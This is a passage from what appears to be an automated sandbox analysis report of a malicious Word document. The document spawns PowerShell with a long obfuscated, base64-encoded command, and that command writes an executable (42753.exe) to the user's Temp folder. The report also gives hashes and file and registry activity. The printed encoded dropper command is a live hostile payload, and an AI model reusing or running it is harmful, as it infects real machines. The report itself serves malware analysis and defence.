| Get Address | Unknown module name | function = _MsoFSetTooltips@4, address_out = 0x6d2e2845 |
|
1 | |
| Get Address | Unknown module name | function = _MsoFLoadToolbarSet@24, address_out = 0x6d2cdd8b |
|
1 | |
| Get Address | Unknown module name | function = _MsoFCreateToolbarSet@28, address_out = 0x6d2823c9 |
|
1 | |
| Get Address | Unknown module name | function = _MsoHpalOffice@0, address_out = 0x6d28c568 |
|
1 | |
| Get Address | Unknown module name | function = _MsoFWndProcNeeded@4, address_out = 0x6d2818d2 |
|
1 | |
| Get Address | Unknown module name | function = _MsoFWndProc@24, address_out = 0x6d282a70 |
|
1 | |
| Get Address | Unknown module name | function = _MsoFCreateITFCHwnd@20, address_out = 0x6d281925 |
|
1 | |
| Get Address | Unknown module name | function = _MsoDestroyITFC@4, address_out = 0x6d28958b |
|
1 | |
| Get Address | Unknown module name | function = _MsoFPitbsFromHwndAndMsg@12, address_out = 0x6d288820 |
|
1 | |
| Get Address | Unknown module name | function = _MsoFGetComponentManager@4, address_out = 0x6d2835a4 |
|
1 | |
| Get Address | Unknown module name | function = _MsoMultiByteToWideChar@24, address_out = 0x6d28ac03 |
|
2 | |
| Get Address | Unknown module name | function = _MsoWideCharToMultiByte@32, address_out = 0x6d284d33 |
|
1 | |
| Get Address | Unknown module name | function = _MsoHrRegisterAll@0, address_out = 0x6d34f8b6 |
|
1 | |
| Get Address | Unknown module name | function = _MsoFSetComponentManager@4, address_out = 0x6d28c179 |
|
1 | |
| Get Address | Unknown module name | function = _MsoFCreateStdComponentManager@20, address_out = 0x6d2819d5 |
|
1 | |
| Get Address | Unknown module name | function = _MsoFHandledMessageNeeded@4, address_out = 0x6d286736 |
|
1 | |
| Get Address | Unknown module name | function = _MsoPeekMessage@8, address_out = 0x6d28649f |
|
1 | |
| Get Address | Unknown module name | function = _MsoFCreateIPref@28, address_out = 0x6d27f9cf |
|
1 | |
| Get Address | Unknown module name | function = _MsoDestroyIPref@4, address_out = 0x6d289320 |
|
1 | |
| Get Address | Unknown module name | function = _MsoChsFromLid@4, address_out = 0x6d27f864 |
|
1 | |
| Get Address | Unknown module name | function = _MsoCpgFromChs@4, address_out = 0x6d281cc5 |
|
1 | |
| Get Address | Unknown module name | function = _MsoSetLocale@4, address_out = 0x6d27f984 |
|
1 | |
| Get Address | Unknown module name | function = _MsoFSetHMsoinstOfSdm@4, address_out = 0x6d28198e |
|
1 | |
| Get Address | Unknown module name | function = _MsoSetVbaInterfaces@8, address_out = 0x6d34ff8d |
|
1 | |
| Get Address | Unknown module name | function = _MsoGetControlInstanceId@8, address_out = 0x6d3286e7 |
|
1 | |
| Get Address | Unknown module name | function = SysFreeString, address_out = 0x76ba3e59 |
|
1 | |
| Get Address | Unknown module name | function = LoadTypeLib, address_out = 0x76bb0aa2 |
|
1 | |
| Get Address | Unknown module name | function = RegisterTypeLib, address_out = 0x76bc1ea6 |
|
1 | |
| Get Address | Unknown module name | function = QueryPathOfRegTypeLib, address_out = 0x76bd351b |
|
1 | |
| Get Address | Unknown module name | function = UnRegisterTypeLib, address_out = 0x76bd1ca9 |
|
1 | |
| Get Address | Unknown module name | function = OleTranslateColor, address_out = 0x76bd26fa |
|
1 | |
| Get Address | Unknown module name | function = OleCreateFontIndirect, address_out = 0x76bc352f |
|
1 | |
| Get Address | Unknown module name | function = OleCreatePictureIndirect, address_out = 0x76bc3df8 |
|
1 | |
| Get Address | Unknown module name | function = OleLoadPicture, address_out = 0x76c07c49 |
|
1 | |
| Get Address | Unknown module name | function = OleCreatePropertyFrameIndirect, address_out = 0x76c093fc |
|
1 | |
| Get Address | Unknown module name | function = OleCreatePropertyFrame, address_out = 0x76c0944a |
|
1 | |
| Get Address | Unknown module name | function = OleIconToCursor, address_out = 0x76c0776e |
|
1 | |
| Get Address | Unknown module name | function = LoadTypeLibEx, address_out = 0x76bb07b7 |
|
1 | |
| Get Address | Unknown module name | function = OleLoadPictureEx, address_out = 0x76c070a1 |
|
1 | |
| Get Address | Unknown module name | function = 600, address_out = 0x721a2b76 |
|
1 |
| Information | Value |
|---|---|
| ID | #2 |
| File Name | c:\windows\system32\windowspowershell\v1.0\powershell.exe |
| Command Line | pOwerSheLL -e KAAnADMANgB9ADEAMQA5AHoAMQAxADUAQAA5ADkARwAxADEANABoADEAMAA1AGgAMQAxADIAZQAxADEANgBEADMAMgB9ADYAMQA+ADMAMgBHADEAMQAwAEQAMQAwADEAZQAxADEAOQBHADQANQB6ADEAMQAxAEQAOQA4AH0AMQAwADYAZQAxADAAMQBAADkAOQB9ADEAMQA2AD4AMwAyAD4ANAA1AH0ANgA3AHoAMQAxADEARwAxADAAOQBEADcAOQBlADkAOABoADEAMAA2AGUAMQAwADEAegA5ADkAegAxADEANgB6ADMAMgB6ADgANwA+ADgAMwB6ADkAOQBEADEAMQA0AEcAMQAwADUAfQAxADEAMgBTADEAMQA2AEcANAA2AEQAOAAzAH0AMQAwADQARwAxADAAMQBTADEAMAA4AHoAMQAwADgAdgA1ADkAaAAzADYAegAxADEAOQB9ADEAMAAxAHoAOQA4AD4AOQA5AH0AMQAwADgAPgAxADAANQBEADEAMAAxAHoAMQAxADAAdgAxADEANgB2ADMAMgB6ADYAMQB2ADMAMgBlADEAMQAwAEAAMQAwADEAfQAxADEAOQB2ADQANQBAADEAMQAxAHYAOQA4AHYAMQAwADYAUwAxADAAMQBAADkAOQB6ADEAMQA2AHYAMwAyAGgAOAAzAGgAMQAyADEAPgAxADEANQBEADEAMQA2AHYAMQAwADEAQAAxADAAOQBAADQANgB9ADcAOAA+ADEAMAAxAGgAMQAxADYAUwA0ADYAdgA4ADcAZQAxADAAMQBTADkAOAB9ADYANwBoADEAMAA4AH0AMQAwADUAQAAxADAAMQBlADEAMQAwAEQAMQAxADYAaAA1ADkAUwAzADYAfQAxADEANABAADkANwBlADEAMQAwAEcAMQAwADAAegAxADEAMQB6ADEAMAA5AHoAMwAyAEAANgAxAD4AMwAyAEQAMQAxADAAPgAxADAAMQB6ADEAMQA5AGgANAA1AH0AMQAxADEAaAA5ADgAegAxADAANgBEADEAMAAxAGUAOQA5AGUAMQAxADYAaAAzADIARAAxADEANAB6ADkANwBoADEAMQAwAEcAMQAwADAAPgAxADEAMQBTADEAMAA5AH0ANQA5AEQAMwA2AGUAMQAxADcAegAxADEANABEADEAMAA4AGUAMQAxADUAaAAzADIAfQA2ADEAZQAzADIAZQAzADkAUwAxADAANABHADEAMQA2AEQAMQAxADYAaAAxADEAMgBHADUAOABoADQANwB6ADQANwA+ADEAMQAwAH0AMQAwADEAdgA5ADcAQAAxADAANwBEADEAMAA5AH0AMQAwADEAPgAxADAAMAB9ADEAMAA1AEQAOQA3AD4ANAA2AHYAOQA5AHoAMQAxADEAZQAxADAAOQBTADQANwBAADEAMAA0AGgAMQAyADEAQAA5ADgAUwAxADAAMgBEADgAMAB6ADYAOAB2ADkAOQB6ADcANgB6ADQANwBTADQANABTADEAMAA0AH0AMQAxADYAUwAxADEANgBoADEAMQAyAGUANQA4AEcANAA3AEQANAA3AHoAMQAxADIAZQAxADEANABHADEAMQAyAEQAMQAxADQAUwAxADEAMQB2ADEAMAAwAEcAMQAxADcARwA5ADkAUwAxADEANgBEADEAMAA1AH0AMQAxADEARwAxADEAMAB9ADEAMQA1AEQANAA2AEcAOQA5AD4AMQAxADEAaAAxADAAOQB6ADQANwBlADgAMQBHADEAMAAzAGUANwA0AEQANAA3AHoANAA0AEAAMQAwADQAfQAxADEANgBHADEAMQA2AGgAMQAxADIAQAA1ADgARwA0ADcAUwA0ADcAZQAxADAAOQBTADkANwB9ADEAMAA4AHoAMQAwADgAUwAxADEANwBEADkAOQB6ADEAMAA0AEcANAA2AHYAOQA5AH0AMQAxADEAaAAxADAAOQBEADQANwB2ADcANgBAADYANgBHADQANwB6ADQANAB6ADEAMAA0AEAAMQAxADYAPgAxADEANgBTADEAMQAyAGgANQA4AFMANAA3AGUANAA3AEcAMQAxADAARAAxADEAMQBAADEAMQA0AD4AMQAwADUAUwAxADEAOQB9ADEAMAAxAGgAOQA4AEAANAA2AHYAMQAxADAAQAAxADAAMQBTADEAMQA2AGUANAA3AHYAMQAxADAAfQA4ADQAPgAxADAAOQBlADgAMABoADcAMABlADEAMQA5AFMANAA3AHoANAA0AEcAMQAwADQAfQAxADEANgA+ADEAMQA2AD4AMQAxADIARAA1ADgAUwA0ADcAUwA0ADcAZQAxADEANgBHADkANwB9ADEAMgAwAH0AOQA3AEcAMQAxADYAQAAxADAANQA+ADEAMQAxAEAAMQAxADAAfQA0ADUAZQAxADAANABlADEAMAA3AHoANAA2AHoAOQA5AD4AMQAxADEAZQAxADAAOQB2ADQANwBEADEAMAAwAD4ANwA2AGgAOAAwAFMAMQAyADIARwAxADIAMQBHADQANwA+ADMAOQA+ADQANgB6ADgAMwBlADEAMQAyAFMAMQAwADgAegAxADAANQB9ADEAMQA2AEcANAAwAD4AMwA5AFMANAA0AFMAMwA5AEQANAAxAEcANQA5AEQAMwA2AGgAMQAxADAAegA5ADcAegAxADAAOQBoADEAMAAxAEcAMwAyAEAANgAxAHoAMwAyAEAAMwA2AEAAMQAxADQAZQA5ADcAegAxADEAMABHADEAMAAwAH0AMQAxADEAfQAxADAAOQA+ADQANgB6ADEAMQAwAD4AMQAwADEAfQAxADIAMABHADEAMQA2AD4ANAAwAH0ANAA5AHoANAA0AGgAMwAyAHoANQA0AD4ANQAzAHYANQAzAEAANQAxAEcANQA0AFMANAAxAH0ANQA5AEQAMwA2AHoAMQAxADIAdgA5ADcAQAAxADEANgBHADEAMAA0AHYAMwAyAHYANgAxAGUAMwAyAFMAMwA2AGUAMQAwADEAfQAxADEAMAB6ADEAMQA4AH0ANQA4AHoAMQAxADYAfQAxADAAMQB9ADEAMAA5AEcAMQAxADIAZQAzADIARAA0ADMAdgAzADIAZQAzADkAaAA5ADIAegAzADkAQAAzADIARwA0ADMAZQAzADIAZQAzADYAfQAxADEAMAB2ADkANwB2ADEAMAA5AEQAMQAwADEAdgAzADIAaAA0ADMAUwAzADIAUwAzADkAUwA0ADYAfQAxADAAMQBAADEAMgAwAGUAMQAwADEAUwAzADkAZQA1ADkAZQAxADAAMgBAADEAMQAxAEQAMQAxADQARwAxADAAMQBEADkANwB2ADkAOQB6ADEAMAA0AEAANAAwAEcAMwA2AD4AMQAxADcAUwAxADEANABTADEAMAA4AGUAMwAyAGgAMQAwADUAdgAxADEAMABAADMAMgBlADMANgBTADEAMQA3AGgAMQAxADQARwAxADAAOABEADEAMQA1AGgANAAxAGUAMQAyADMAdgAxADEANgBAADEAMQA0AFMAMQAyADEAdgAxADIAMwB2ADMANgBlADEAMQA5AGUAMQAwADEAaAA5ADgARwA5ADkAfQAxADAAOAB6ADEAMAA1AHoAMQAwADEAfQAxADEAMABEADEAMQA2AGgANAA2AEQANgA4AHYAMQAxADEAUwAxADEAOQBHADEAMQAwAHoAMQAwADgAdgAxADEAMQBEADkANwBTADEAMAAwAGgANwAwAHoAMQAwADUAegAxADAAOAB9ADEAMAAxAH0ANAAwAGUAMwA2AEQAMQAxADcAZQAxADEANAA+ADEAMAA4AD4ANAA2AGgAOAA0AEcAMQAxADEARAA4ADMAfQAxADEANgBoADEAMQA0AH0AMQAwADUAegAxADEAMABAADEAMAAzAD4ANAAwAGUANAAxAGgANAA0AEQAMwAyAH0AMwA2AEcAMQAxADIARAA5ADcAPgAxADEANgBoADEAMAA0AEcANAAxAHoANQA5AEAAOAAzAD4AMQAxADYAPgA5ADcAaAAxADEANABAADEAMQA2AGUANAA1AFMAOAAwAH0AMQAxADQARwAxADEAMQBoADkAOQBAADEAMAAxAH0AMQAxADUARwAxADEANQB2ADMAMgBTADMANgBlADEAMQAyAEQAOQA3AFMAMQAxADYAdgAxADAANAA+ADUAOQBoADkAOABHADEAMQA0AGgAMQAwADEAfQA5ADcAaAAxADAANwB9ADUAOQB6ADEAMgA1AEAAOQA5AEcAOQA3AGUAMQAxADYAPgA5ADkAZQAxADAANABHADEAMgAzAEAAMQAxADkAdgAxADEANAA+ADEAMAA1AGUAMQAxADYAaAAxADAAMQBAADQANQBTADEAMAA0AHoAMQAxADEAaAAxADEANQB2ADEAMQA2AEQAMwAyAGgAMwA2AEAAOQA1AGgANAA2AEcANgA5AD4AMQAyADAAaAA5ADkAUwAxADAAMQBHADEAMQAyAEAAMQAxADYAaAAxADAANQBAADEAMQAxAEQAMQAxADAAUwA0ADYAPgA3ADcAaAAxADAAMQBlADEAMQA1AHoAMQAxADUAPgA5ADcAaAAxADAAMwBAADEAMAAxAGgANQA5AHoAMQAyADUAaAAxADIANQAnACAALQBzAFAAbABJAFQAIAAnAHoAJwAtAFMAcABMAGkAdAAgACcAZQAnACAALQBzAFAAbABpAHQAJwA+ACcAIAAtAFMAcABMAGkAVAAgACcAUwAnAC0AcwBwAGwASQBUACcARAAnAC0AUwBwAGwASQBUACcAfQAnAC0AUwBQAGwAaQB0ACAAJwBHACcALQBzAHAAbABpAHQAJwBoACcALQBTAFAATABpAFQAIAAnAEAAJwAtAFMAcABsAGkAdAAnAHYAJwB8ACAAJQB7ACgAIABbAGkATgB0AF0AJABfACAALQBhAFMAWwBDAGgAYQBSAF0AKQAgAH0AKQAtAGoAbwBpAE4AJwAnACAAfAAgACYAKAAgACQAUABTAEgATwBNAEUAWwAyADEAXQArACQAUA |
| Initial Working Directory | C:\Users\BGC6u8Oy yXGxkR\Desktop\ |
| Monitor | Start Time: 00:00:23, Reason: Child Process |
| Unmonitor | End Time: 00:02:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:02:02 |
| Information | Value |
|---|---|
| PID | 0xa68 |
| Parent PID | 0x9c4 (c:\program files\microsoft office\office15\winword.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | F71GWAT\BGC6u8Oy yXGxkR |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
A6C
0x
A80
0x
A84
0x
A88
0x
A8C
0x
A90
0x
A94
0x
A9C
0x
AA4
0x
AA8
0x
AAC
0x
AB0
0x
ACC
0x
AD8
|
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| c:\users\bgc6u8oy yxgxkr\appdata\local\temp\42753.exe | 100.00 KB (102400 bytes) |
MD5:
d6c8126371d37ffe3100755db6aa22ed
SHA1: 294b381e200aa3f343989877c9ef5efdda25ca42 SHA256: fbff242aeeff98285e000ef03cfa96e87d6d63c41080d531edcb455646b64eec |
|
|
| Operation | Class | Interface | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Create | WScript.Shell | IClassFactory | cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER |
|
1 |
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Temp\42753.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Get Info | C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\pOwerSheLL.config | type = file_attributes |
|
3 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0 | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR | type = file_attributes |
|
5 | |
| Get Info | C:\ | type = file_attributes |
|
6 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\Desktop | type = file_attributes |
|
9 | |
| Get Info | C:\Users | type = file_attributes |
|
4 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\profile.ps1 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Microsoft.PowerShell_profile.ps1 | type = file_attributes |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\Documents\WindowsPowerShell\profile.ps1 | type = file_attributes |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config | type = file_type |
|
2 | |
| Get Info | C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config | type = size, size_out = 0 |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Temp\42753.exe | type = file_type |
|
2 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Temp\42753.exe | type = file_attributes |
|
3 | |
| Open | STD_INPUT_HANDLE |
|
1 | ||
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | size = 4096, size_out = 4096 |
|
3 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | size = 4096, size_out = 3315 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | size = 781, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml | size = 4096, size_out = 4096 |
|
41 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml | size = 4096, size_out = 436 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | size = 4096, size_out = 4096 |
|
6 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | size = 4096, size_out = 2530 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | size = 542, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 4096, size_out = 4096 |
|
5 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 4096, size_out = 4018 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 78, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | size = 4096, size_out = 4096 |
|
6 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | size = 4096, size_out = 2762 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | size = 310, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | size = 4096, size_out = 4096 |
|
17 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | size = 4096, size_out = 3022 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | size = 50, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | size = 4096, size_out = 4096 |
|
6 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | size = 4096, size_out = 281 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml | size = 4096, size_out = 4096 |
|
62 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml | size = 4096, size_out = 3895 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml | size = 201, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | size = 4096, size_out = 4096 |
|
21 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | size = 4096, size_out = 3687 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | size = 409, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | size = 4096, size_out = 4096 |
|
4 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | size = 4096, size_out = 2228 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | size = 844, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml | size = 4096, size_out = 4096 |
|
4 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml | size = 4096, size_out = 3736 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml | size = 360, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config | size = 4096, size_out = 4096 |
|
6 | |
| Read | C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config | size = 4096, size_out = 1459 |
|
1 | |
| Read | C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config | size = 4096, size_out = 0 |
|
1 | |
| Write | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Temp\42753.exe | size = 4096 |
|
3 | |
| Write | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Temp\42753.exe | size = 8575 |
|
1 | |
| Write | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Temp\42753.exe | size = 4616 |
|
1 | |
| Write | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Temp\42753.exe | size = 23232 |
|
1 | |
| Write | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Temp\42753.exe | size = 45012 |
|
1 | |
| Write | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Temp\42753.exe | size = 4356 |
|
1 | |
| Write | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Temp\42753.exe | size = 4321 |
|
1 |
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1 |
|
1 | ||
